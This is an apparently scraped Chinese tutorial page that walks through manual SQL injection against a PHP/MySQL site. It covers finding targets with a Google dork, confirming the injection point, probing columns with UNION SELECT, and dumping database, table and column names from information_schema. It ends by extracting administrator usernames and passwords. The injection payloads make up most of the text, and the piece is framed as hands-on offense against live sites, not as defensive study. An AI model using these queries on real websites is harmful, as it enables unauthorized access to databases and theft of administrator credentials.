好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

php手工注射MYSQL5.0注入 - 网站安全 - 自学php

我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。

利用工具:google 管中窥豹 使用语句:site:heib0y测试数据 inurl:php 可以找出注入点 首先 语句加’

http://HdhCmsTest2cto测试数据 /products/shop.php?c=misc&id=8′

报错

and 1=1 和and 1=2  一个正常一个错误 很明显的注射点

第三步:id=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11–

页面出现数字5和8,

在5的位置使用内置函数user()爆出当前的数据库使用账户

分别使用database(),version()代替5的位置可以爆出数据库名和MYSQL的版本() 5.1.66-community-log

第四步:有了数据库的库名和5.0以上版本信息,我们可以快速爆出所有表名,使用的语法是

php?id=72 and 1=2 union select 1,2,3,4,group_concat(table_name) 6,7,8,9,10,11 from information_schema.tables where table_schema=0x68706F6C

0x68706F6C 这里是数据库的十六进制的编码形式,使用小葵编码一下就行

从中找出敏感表名如admin user admins等等,再爆出管理的字段使用的语句是

php?id=72 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E6973747261746F72  /*此处是表名的十六进制表示*/

我们这里爆出的字段是password和name

最后一步:我们来爆出网站管理员的账号和密码这里是双暴字段方式

使用语句:

and 1=2 UNION SELECT 1,2,3,4,5,6,7,group_concat(name,0x3a,password),9,10,11 from admins

 

查看更多关于php手工注射MYSQL5.0注入 - 网站安全 - 自学php的详细内容...

  阅读:49次